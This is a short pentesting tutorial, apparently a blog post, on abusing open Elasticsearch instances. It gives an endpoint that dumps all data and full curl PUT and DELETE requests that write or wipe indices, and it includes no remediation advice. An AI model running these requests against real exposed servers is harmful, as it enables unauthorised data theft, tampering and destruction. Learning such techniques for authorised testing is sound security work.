Exploiting Elastic Search Instances

Elastic search instances can have exploitation of READ,WRITE,DELETE of data.

If any bug bounty hunter or penetration tester has found an open elastic search instance he/she can try out all the below attacks.

1. READ data-

An attacker can dump all the data by going to the endpoint http://redated.com:9200/_search?pretty=true

2. WRITE data-

An attacker can simply create new data using the simple curl request-

curl -i -s -k  -X $'PUT' \
    -H $'Host: [ip]:[port]' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.9999.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' \
    $'https://[ip]:[port]/[name]'

In the picture above i have created a new entry with the name test.

3. DELETE data:

An attacker can simply delete any data using the simple curl request-

curl -i -s -k  -X $'DELETE' \
    -H $'Host: [ip]:[port]' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.9999.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' \
    $'https://[ip]:[port]/[NAME]'

Impact-

An attacker can simply dump all the important data, delete it, rewrite it.

— — — — — — — — — — — — — — hacker_might — — — — — — — — — — — — — — — -